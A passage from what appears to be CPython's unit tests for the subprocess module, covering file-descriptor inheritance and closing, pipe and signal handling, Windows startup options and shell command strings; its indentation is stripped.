args = list(ZERO_RETURN_CMD[1:])
path, program = os.path.split(ZERO_RETURN_CMD[0])
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program]+args)
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'%s' %s" % (abs_program, " ".join(args).encode("utf-8"))
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program]+args, env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program]+args, env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE aftr setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
ZERO_RETURN_CMD,
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
# bpo-32270: Ensure that descriptors specified in pass_fds
# are inherited even if they are used in redirections.
# Contributed by @izbyshev.
def test_pass_fds_redirected(self):
"""Regression test for https://bugs.python.org/issue32270."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
pass_fds = []
for _ in range(2):
fd = os.open(os.devnull, os.O_RDWR)
self.addCleanup(os.close, fd)
pass_fds.append(fd)
stdout_r, stdout_w = os.pipe()
self.addCleanup(os.close, stdout_r)
self.addCleanup(os.close, stdout_w)
pass_fds.insert(1, stdout_w)
with subprocess.Popen([sys.executable, fd_status],
stdin=pass_fds[0],
stdout=pass_fds[1],
stderr=pass_fds[2],
close_fds=True,
pass_fds=pass_fds):
output = os.read(stdout_r, 1024)
fds = {int(num) for num in output.split(b',')}
self.assertEqual(fds, {0, 1, 2} | frozenset(pass_fds), f"output={output!a}")
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError) as err:
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
False, [], 0, -1,
func)
# Attempt to prevent
# "TypeError: fork_exec() takes exactly N arguments (M given)"
# from passing the test. More refactoring to have us start
# with a valid *args list, confirm a good call with that works
# before mutating it in various ways to ensure that bad calls
# with individual arg type errors raise a typeerror would be
# ideal. Saving that for a future PR...
self.assertNotIn('takes exactly', str(err.exception))
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
None, None, None, -1,
None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = ZERO_RETURN_CMD
proc = subprocess.Popen(args)
# Wait until the real process completes to avoid zombie process
pid = proc.pid
pid, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
def test_send_signal_race(self):
# bpo-38630: send_signal() must poll the process exit status to reduce
# the risk of sending the signal to the wrong process.
proc = subprocess.Popen(ZERO_RETURN_CMD)
# wait until the process completes without using the Popen APIs.
pid, status = os.waitpid(proc.pid, 0)
self.assertEqual(pid, proc.pid)
self.assertTrue(os.WIFEXITED(status), status)
self.assertEqual(os.WEXITSTATUS(status), 0)
# returncode is still None but the process completed.
self.assertIsNone(proc.returncode)
with mock.patch("os.kill") as mock_kill:
proc.send_signal(signal.SIGTERM)
# send_signal() didn't call os.kill() since the process already
# completed.
mock_kill.assert_not_called()
# Don't check the returncode value: the test reads the exit status,
# so Popen failed to read it and uses a default returncode instead.
self.assertIsNotNone(proc.returncode)
def test_communicate_repeated_call_after_stdout_close(self):
proc = subprocess.Popen([sys.executable, '-c',
'import os, time; os.close(1), time.sleep(2)'],
stdout=subprocess.PIPE)
while True:
try:
proc.communicate(timeout=0.1)
return
except subprocess.TimeoutExpired:
pass
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USERSHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USERSHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_copy(self):
# bpo-34044: Popen must not modify input STARTUPINFO structure
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
# Call Popen() twice with the same startupinfo object to make sure
# that it's not modified
for _ in range(2):
cmd = ZERO_RETURN_CMD
with open(os.devnull, 'w') as null:
proc = subprocess.Popen(cmd,
stdout=null,
stderr=subprocess.STDOUT,
startupinfo=startupinfo)
with proc:
proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(startupinfo.dwFlags,
subprocess.STARTF_USESHOWWINDOW)
self.assertIsNone(startupinfo.hStdInput)
self.assertIsNone(startupinfo.hStdOutput)
self.assertIsNone(startupinfo.hStdError)
self.assertEqual(startupinfo.wShowWindow, subprocess.SW_HIDE)
self.assertEqual(startupinfo.lpAttributeList, {"handle_list": []})
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with support.check_warnings((".*overriding close_fds", RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
This avoids the need to actually try and get test environments to send
and receive signals reliably across platforms. The net effect of a ^C
happening during a blocking subprocess execution which we want to clean
up from is a KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
# cleanup the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle", "pwd", "grp"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
